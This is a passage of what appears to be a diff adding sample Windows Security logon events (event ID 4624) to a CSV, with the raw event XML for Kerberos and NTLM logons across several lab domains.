+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x10fbeb</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">BAEC19DA-130D-80F0-BD26-78045EE64D62</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49249</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T02:15:49.598756+04:00,1552947349.598756,4624,Administrator,EXAMPLE,3,Kerberos,10.0.2.17,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:49.583102Z"">
+    </TimeCreated>
+    <EventRecordID>563285</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""3564"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x10fbcc</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">BAEC19DA-130D-80F0-BD26-78045EE64D62</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">10.0.2.17</Data>
+    <Data Name=""IpPort"">49244</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+  </EventData>
+</Event>"
+2019-03-19T02:15:49.567435+04:00,1552947349.567435,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T22:15:36.036376Z"">
+    </TimeCreated>
+    <EventRecordID>563265</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""TargetDomainName"">EXAMPLE</Data>
+    <Data Name=""TargetLogonId"">0x10fac2</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName""></Data>
+    <Data Name=""LogonGuid"">5FDB15EE-2283-F23C-E23B-5E5DDB11BB9C</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">fe80::79bf:8ee2:433c:2567</Data>
+    <Data Name=""IpPort"">55585</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:27.629413+04:00,1549099047.629413,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,::1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:23.206182Z"">
+    </TimeCreated>
+    <EventRecordID>65971</EventRecordID>
+    <Correlation ActivityID=""E7B51CDE-BAD3-0000-481F-B5E7D3BAD401"">
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1280"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24db24</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">5A66FDFF-B4E8-5133-53A9-72A5DE1C31FB</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">50152</Data>
+    <Data Name=""ImpersonationLevel"">%%1840</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:23.193671+04:00,1549099043.193671,4624,EXCHANGE$,ICORP,3,NtLmSsp,192.168.111.87,EXCHANGE,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:17:22.563018Z"">
+    </TimeCreated>
+    <EventRecordID>65969</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-2895268558-4179327395-2773671012-1108</Data>
+    <Data Name=""TargetUserName"">EXCHANGE$</Data>
+    <Data Name=""TargetDomainName"">ICORP</Data>
+    <Data Name=""TargetLogonId"">0x24daa6</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">EXCHANGE</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">192.168.111.87</Data>
+    <Data Name=""IpPort"">58128</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2019-02-02T13:17:22.562534+04:00,1549099042.562534,4624,ICORP-DC$,INTERNAL.CORP,3,Kerberos,127.0.0.1,-,ICORP-DC.internal.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-02T09:16:58.787262Z"">
+    </TimeCreated>
+    <EventRecordID>65967</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""612"" ThreadID=""1884"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>ICORP-DC.internal.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">ICORP-DC$</Data>
+    <Data Name=""TargetDomainName"">INTERNAL.CORP</Data>
+    <Data Name=""TargetLogonId"">0x24c879</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">94BA67EA-8490-3C86-6DB7-DF74C9AA4449</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">127.0.0.1</Data>
+    <Data Name=""IpPort"">50151</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-05T09:39:30.697730Z"">
+    </TimeCreated>
+    <EventRecordID>10113</EventRecordID>
+    <Correlation ActivityID=""FDC063DE-4B69-0000-5564-C0FD694BD501"">
+    </Correlation>
+    <Execution ProcessID=""620"" ThreadID=""5596"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x2e4ce</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x38f87e</Data>
+    <Data Name=""LogonType"">9</Data>
+    <Data Name=""LogonProcessName"">seclogo</Data>
+    <Data Name=""AuthenticationPackageName"">Negotiate</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x1b90</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">0</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">l</Data>
+    <Data Name=""TargetOutboundDomainName"">o</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1843</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:58:04.842263Z"">
+    </TimeCreated>
+    <EventRecordID>2982101</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">01566S-WIN16-IR$</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x73b44c</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">E8C9AC4A-31FC-C37F-B4D7-B3217C608858</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">::1</Data>
+    <Data Name=""IpPort"">64849</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.499428+04:00,1639331872.499428,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.497329Z"">
+    </TimeCreated>
+    <EventRecordID>2982097</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""2456"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738cf9</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50616</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.375084+04:00,1639331872.375084,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.372001Z"">
+    </TimeCreated>
+    <EventRecordID>2982092</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738ce4</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50614</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.366793+04:00,1639331872.366793,4624,lgrove,3B,3,NtLmSsp,172.16.66.19,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.325837Z"">
+    </TimeCreated>
+    <EventRecordID>2982089</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">3B</Data>
+    <Data Name=""TargetLogonId"">0x738afd</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">NtLmSsp </Data>
+    <Data Name=""AuthenticationPackageName"">NTLM</Data>
+    <Data Name=""WorkstationName"">04246W-WIN10</Data>
+    <Data Name=""LogonGuid"">00000000-0000-0000-0000-000000000000</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">NTLM V2</Data>
+    <Data Name=""KeyLength"">128</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50613</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+2021-12-12T21:57:52.313673+04:00,1639331872.313673,4624,lgrove,THREEBEESCO.COM,3,Kerberos,172.16.66.19,-,01566s-win16-ir.threebeesco.com,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-12T17:57:52.278193Z"">
+    </TimeCreated>
+    <EventRecordID>2982084</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""624"" ThreadID=""3652"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>01566s-win16-ir.threebeesco.com</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-21-308926384-506822093-3341789130-101606</Data>
+    <Data Name=""TargetUserName"">lgrove</Data>
+    <Data Name=""TargetDomainName"">THREEBEESCO.COM</Data>
+    <Data Name=""TargetLogonId"">0x738ae4</Data>
+    <Data Name=""LogonType"">3</Data>
+    <Data Name=""LogonProcessName"">Kerberos</Data>
+    <Data Name=""AuthenticationPackageName"">Kerberos</Data>
+    <Data Name=""WorkstationName"">-</Data>
+    <Data Name=""LogonGuid"">DCED4BA6-CF24-37EF-0627-B0E4EED7F565</Data>
+    <Data Name=""TransmittedServices"">-</Data>
+    <Data Name=""LmPackageName"">-</Data>
+    <Data Name=""KeyLength"">0</Data>
+    <Data Name=""ProcessId"">0x0</Data>
+    <Data Name=""ProcessName"">-</Data>
+    <Data Name=""IpAddress"">172.16.66.19</Data>
+    <Data Name=""IpPort"">50609</Data>
+    <Data Name=""ImpersonationLevel"">%%1833</Data>
+    <Data Name=""RestrictedAdminMode"">-</Data>
+    <Data Name=""TargetOutboundUserName"">-</Data>
+    <Data Name=""TargetOutboundDomainName"">-</Data>
+    <Data Name=""VirtualAccount"">%%1843</Data>
+    <Data Name=""TargetLinkedLogonId"">0x0</Data>
+    <Data Name=""ElevatedToken"">%%1842</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,WIN-77LTAPHIQ1R$,EXAMPLE,3,Kerberos,fe80::79bf:8ee2:433c:2567,,WIN-77LTAPHIQ1R.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4624</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12544</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:21.929554Z"">
+    </TimeCreated>
+    <EventRecordID>566894</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""696"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-0-0</Data>
+    <Data Name=""SubjectUserName"">-</Data>
+    <Data Name=""SubjectDomainName"">-</Data>
+    <Data Name=""SubjectLogonId"">0x0</Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
